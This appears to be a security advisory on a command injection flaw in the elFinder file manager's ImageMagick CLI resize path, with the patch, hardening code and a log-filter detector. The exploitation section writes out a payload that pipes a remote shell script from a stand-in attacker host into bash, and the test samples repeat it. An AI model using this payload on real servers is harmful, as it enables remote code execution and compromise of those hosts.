Apr 20, 2026 · 7 min read
elFinder versions prior to 2.1.67 are vulnerable to unauthenticated remote code execution. The image resize functionality fails to sanitize the `bg` parameter, allowing attackers to inject shell commands into the ImageMagick CLI execution context.
A critical command injection vulnerability in the elFinder web file manager allows unauthenticated remote attackers to execute arbitrary system commands. This flaw occurs when elFinder is configured to use the ImageMagick CLI driver, due to improper sanitization of the background color parameter during image resize operations.
elFinder is a widely deployed open-source file manager for web applications, providing a user interface and a backend connector for file operations. The application supports various image processing engines to handle tasks such as resizing and cropping. Administrators can configure elFinder to use the ImageMagick command-line interface as the underlying processor when native PHP extensions are unavailable. This specific configuration exposes an attack surface within the image manipulation endpoints.
The vulnerability, tracked as GHSA-8q4h-8crm-5cvc, constitutes an Improper Neutralization of Special Elements used in a Command (CWE-77). It specifically manifests in the handling of the background color parameter during image resize or rotation operations. The application routes this parameter directly into system-level execution contexts without sanitization. This architectural decision creates a direct conduit between external HTTP requests and the underlying operating system shell.
Successful exploitation results in arbitrary command execution on the host server. The injected commands execute under the privilege context of the web server process handling the elFinder requests. This level of access permits complete compromise of the web application, exfiltration of sensitive configuration data, and establishes a foothold for further lateral movement within the network.
The fundamental flaw resides within the _imgResize method located in the elFinderVolumeDriver.class.php file. This method is responsible for applying transformations to images, such as adjusting dimensions or rotating the image by specific degrees. When a rotation or padding operation requires a background fill, the method accepts a user-controlled bg (background color) parameter to define the fill color.
In vulnerable versions of the application, the elFinderVolumeDriver constructs a system command string to invoke the ImageMagick utilities, specifically `convert` or `mogrify`. The application concatenates the `bg` parameter directly into the argument list of this string. The PHP script then passes the fully constructed string to native shell execution functions such as `exec()` or `system()`.
The absence of input neutralization allows shell metacharacters to alter the execution logic of the resulting command. The application expects a string representing a color, such as white or #FFFFFF. However, an attacker can supply shell operators like semicolons, ampersands, or command substitution constructs. The underlying operating system shell interprets these metacharacters as instruction boundaries, executing the attacker's arbitrary commands alongside the intended ImageMagick invocation.
The vulnerability manifests where the application prepares the command arguments for ImageMagick. The application takes the input parameter and directly embeds it into the shell command structure. This pattern demonstrates the danger of relying on string concatenation for command construction instead of using parameterized execution APIs.
```php
// Vulnerable Code Pattern (Conceptual)
// The unsanitized $bg parameter is directly concatenated
$cmd = "convert input.jpg -rotate $degree -background $bg output.jpg";
exec($cmd);
```

The maintainers addressed this vulnerability in version 2.1.67 by implementing strict input validation on the `$bg` parameter. Rather than attempting to escape shell characters, which is prone to bypasses, the patch uses an allowlist approach. The application now enforces a strict regular expression against the input value before it can be used in the command construction.
```php
// Patched Code Validation
// Input is validated against a strict regex before use
if (!preg_match('/^(#[0-9a-f]{3,6}|transparent)$/i', $bg)) {
    return false; // Reject the input
}
```

The fix is complete and highly effective for this specific parameter. The regex `preg_match('/^(#[0-9a-f]{3,6}|transparent)$/i', $bg)` ensures the background color can only consist of a valid hexadecimal color code or the exact string `transparent`. The use of the start `^` and end `$` anchors is critical, as it prevents attackers from prepending or appending shell commands to an otherwise valid color code. This effectively closes the injection vector.
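The following is an added example, not code from elFinder or its maintainers. It combines the allowlist check with the same shape as the 2.1.67 fix with command construction that escapes every operand, and runs both over a handful of constructed inputs, including the injection shape described above and two edge cases around the regex anchors. The helper names `isSafeBgColor` and `buildConvertCommand` are hypothetical.

```php
<?php
// Added example, not code from elFinder: an allowlist check with the same
// shape as the 2.1.67 fix, followed by command construction that escapes
// every operand. The helper names are hypothetical.

/**
 * Returns true only for a 3- to 6-digit hex colour or the literal
 * "transparent". Named colours such as "white" are outside the allowlist.
 */
function isSafeBgColor(string $bg): bool
{
    return preg_match('/^(#[0-9a-f]{3,6}|transparent)$/i', $bg) === 1;
}

/**
 * Builds the convert(1) command line. The colour must pass the allowlist,
 * and every operand goes through escapeshellarg(), so even a value that
 * slips past the regex reaches convert as one quoted argument rather than
 * as shell syntax. Returns null when the colour is rejected.
 */
function buildConvertCommand(string $in, string $out, int $degree, string $bg): ?string
{
    if (!isSafeBgColor($bg)) {
        return null;
    }
    return 'convert ' . escapeshellarg($in)
        . ' -rotate ' . $degree
        . ' -background ' . escapeshellarg($bg)
        . ' ' . escapeshellarg($out);
}

// Constructed inputs: legitimate colours, the injection shape from the
// advisory, and two edge cases around the regex anchors.
$samples = [
    '#fff',
    '#FFFFFF',
    'transparent',
    'white',                                           // legitimate colour name, but outside the allowlist
    'white; curl http://attacker.example/shell.sh | bash; #',
    "#fff\n",                                          // passes: $ also matches before a single trailing newline
    "#fff\nid",                                        // rejected: text follows the newline
];

foreach ($samples as $bg) {
    $cmd = buildConvertCommand('input.jpg', 'output.jpg', 90, $bg);
    printf("%-58s => %s\n", json_encode($bg, JSON_UNESCAPED_SLASHES), $cmd ?? 'REJECTED');
}
```

Run it with `php allowlist.php`. Two points worth noticing: in PCRE, `$` without the `D` modifier also matches just before a single trailing newline, so `"#fff\n"` passes the regex as written; anchoring with `\z` (or adding `/D`) removes that quirk. Even so, `escapeshellarg()` wraps the value in single quotes, inside which a newline is literal, so the shell still receives exactly one argument. Layering the allowlist and the per-argument escaping is what keeps a regex edge case from turning back into a command boundary.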
Exploitation requires the attacker to identify an elFinder instance configured to use the ImageMagick CLI driver. This configuration is standard in environments lacking the PHP imagick or gd extensions. The attacker initiates the attack by interacting with the elFinder UI or API to trigger an image transformation operation, such as rotating an uploaded image.
The attacker intercepts the HTTP request and modifies the bg parameter. The payload must begin with a syntactically valid shell separator to terminate the convert command arguments, followed by the arbitrary system command. A common injection pattern utilizes the semicolon character to chain commands sequentially.
A specific payload example takes the form of `white; curl http://attacker.com/shell.sh | bash; #`. When processed by the vulnerable application, the resulting shell string becomes `convert input.jpg -rotate 90 -background white; curl http://attacker.com/shell.sh | bash; # output.jpg`.
The operating system executes convert, immediately followed by the execution of the curl command. The trailing # acts as a comment character, neutralizing the remainder of the original command string and preventing syntax errors that might interrupt the shell execution. The payload successfully achieves arbitrary code execution without triggering application-level errors.
The vulnerability carries a critical severity rating, evidenced by a CVSS base score of 9.8. This score reflects the low attack complexity, the lack of required privileges, and the network-based attack vector. Any user capable of reaching the elFinder connector endpoint can exploit this flaw, provided the underlying ImageMagick CLI configuration is active.
Successful exploitation grants the attacker full command execution capabilities within the context of the web application. The attacker operates with the permissions of the web server service account, typically www-data or apache. This access permits the reading of sensitive configuration files, including database credentials and application secrets stored locally on the server.
The blast radius extends beyond data theft to include complete system compromise. Attackers can deploy persistent backdoors, install ransomware, or use the compromised web server as a staging point for attacks against the internal network. The severity is contingent entirely on the environment's reliance on the ImageMagick CLI; deployments utilizing PHP GD or the native PHP Imagick extension are not susceptible to this specific execution path.
The primary remediation strategy requires upgrading the studio-42/elfinder package to version 2.1.67 or later. Administrators managing elFinder via Composer should update their dependency specifications and run the update command to pull the patched version. Verifying the installation involves confirming the regex validation exists within the elFinderVolumeDriver.class.php file.
If immediate patching is unfeasible, administrators must disable the ImageMagick CLI driver within the elFinder configuration. The application should be reconfigured to utilize the PHP GD extension or the PHP Imagick extension. These native extensions process images through shared libraries and APIs, entirely avoiding the generation of system shell commands and neutralizing the command injection vector.
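The following is an added example, not elFinder's own `connector.php`: it shows the weak volume setting beside the corrected one for the remediation steps above. The option name `imgLib` and its values (`'auto'`, `'imagick'`, `'gd'`, `'convert'`) are as documented for elFinder to the best of this example's knowledge; verify them against the installed version. The `selectImgLib` helper and the paths are hypothetical.

```php
<?php
// Added example, not elFinder's own connector.php: two versions of a volume
// root for the PHP connector. The option name imgLib and its values ('auto',
// 'imagick', 'gd', 'convert') are as documented for elFinder to the best of
// this example's knowledge; check them against the installed version.

/**
 * Chooses an in-process image library and refuses to fall back to the
 * 'convert' CLI driver when neither extension is present. Hypothetical helper.
 */
function selectImgLib(): string
{
    if (extension_loaded('imagick')) {
        return 'imagick';
    }
    if (extension_loaded('gd')) {
        return 'gd';
    }
    throw new RuntimeException(
        'No in-process image library available; install php-imagick or php-gd instead of enabling the convert driver'
    );
}

// Weak setting: shells out to ImageMagick's convert binary, the execution
// path affected before 2.1.67.
$weakRoot = [
    'driver' => 'LocalFileSystem',
    'path'   => '/var/www/files/',   // constructed path
    'URL'    => '/files/',
    'imgLib' => 'convert',
];

// Corrected setting: image work stays inside the PHP process, so no shell
// command string is ever built from request parameters.
$hardenedRoot = [
    'driver' => 'LocalFileSystem',
    'path'   => '/var/www/files/',
    'URL'    => '/files/',
    'imgLib' => selectImgLib(),
];

$opts = ['roots' => [$hardenedRoot]];
printf("imgLib in use: %s\n", $opts['roots'][0]['imgLib']);
```

Leaving `imgLib` at `'auto'` is only safe if the deployment is known to have `imagick` or `gd` loaded; the helper above makes the choice explicit and fails loudly rather than silently dropping to the CLI driver on a host where neither extension is installed.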
At the network edge, security teams should implement Web Application Firewall (WAF) rules to inspect traffic destined for the elFinder connector endpoint. The WAF policy must enforce strict input validation on the bg query parameter, blocking requests that contain shell metacharacters such as semicolons, pipes, ampersands, or backticks. This defensive layer provides compensating controls while the underlying application is scheduled for patching.
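The following is an added example, not code from elFinder or any WAF product: a small request-log filter that applies the rule described above, flagging connector requests whose `bg` parameter fails the upstream allowlist and carries shell metacharacters. The log format, the request lines and the `parseLogLine`, `shellMetaFound` and `shouldBlock` helpers are all constructed for this illustration.

```php
<?php
// Added example, not from elFinder or any WAF product: a request-log filter
// that flags elFinder connector calls whose bg parameter carries shell
// metacharacters, mirroring the WAF rule described in the text.

/** Parses one constructed log line of the form "<METHOD> <path>?<query> <status>". */
function parseLogLine(string $line): ?array
{
    if (!preg_match('~^(\S+)\s+(\S+?)(?:\?(\S*))?\s+(\d{3})$~', $line, $m)) {
        return null;
    }
    parse_str($m[3] ?? '', $query); // percent-decodes the query parameters
    return ['method' => $m[1], 'path' => $m[2], 'query' => $query, 'status' => (int) $m[4]];
}

/** Returns the shell metacharacters present in $value, or an empty array if it is clean. */
function shellMetaFound(string $value): array
{
    $meta = [';', '|', '&', '`', '$(', "\n", '>', '<'];
    $found = [];
    foreach ($meta as $m) {
        if (strpos($value, $m) !== false) {
            $found[] = $m;
        }
    }
    return $found;
}

/** Decides whether a parsed request should be blocked. */
function shouldBlock(array $req): bool
{
    if (strpos($req['path'], 'connector') === false) {
        return false; // only the elFinder connector endpoint is in scope
    }
    $bg = $req['query']['bg'] ?? null;
    if ($bg === null) {
        return false;
    }
    // Allowlist first, with \z so a trailing newline cannot sneak past the anchor;
    // then the metacharacter blocklist, so the reviewer can see why a request was dropped.
    if (preg_match('/^(#[0-9a-f]{3,6}|transparent)\z/i', $bg) === 1) {
        return false;
    }
    return shellMetaFound($bg) !== [];
}

// Constructed sample requests; the parameter names follow the resize request
// described in the advisory (bg, degree) and are not taken from live traffic.
$logLines = [
    'GET /elfinder/php/connector.php?cmd=resize&target=l1_aW1n&mode=rotate&degree=90&bg=%23ffffff 200',
    'GET /elfinder/php/connector.php?cmd=resize&target=l1_aW1n&mode=rotate&degree=90&bg=white 200',
    'GET /elfinder/php/connector.php?cmd=resize&target=l1_aW1n&mode=rotate&degree=90&bg=white%3B%20id%20%23 200',
    'GET /elfinder/php/connector.php?cmd=resize&target=l1_aW1n&mode=rotate&degree=90&bg=%60id%60 200',
    'GET /index.php?bg=white%3B%20id 200', // same parameter name, but not the connector
];

foreach ($logLines as $line) {
    $req = parseLogLine($line);
    if ($req === null) {
        continue;
    }
    $bg = $req['query']['bg'] ?? '-';
    printf("%-5s bg=%-24s meta=%-10s %s\n",
        shouldBlock($req) ? 'BLOCK' : 'allow',
        json_encode($bg, JSON_UNESCAPED_SLASHES),
        implode('', shellMetaFound($bg)),
        $req['path']);
}
```

The first two requests are allowed (`white` fails the allowlist but contains no metacharacter, which matches the rule as stated in the text), the third and fourth are blocked because of `;` and the backticks, and the last is ignored because the path is not the connector endpoint. In a real deployment the same check should also run over POST bodies, since the connector accepts parameters there as well, and the decision should be logged with the offending characters so that a blocked request can be triaged quickly.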
CVSS vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| elFinder (Studio-42) | < 2.1.67 | 2.1.67 |
| Attribute | Detail |
|---|---|
| Vulnerability Class | Command Injection (CWE-77) |
| Attack Vector | Network |
| CVSS v3.1 Score | 9.8 Critical |
| Authentication Required | None |
| Configuration Requirement | ImageMagick CLI Driver active |
| Exploit Status | Proof of Concept available |
| Impact | Remote Code Execution (RCE) |
Improper Neutralization of Special Elements used in a Command ('Command Injection')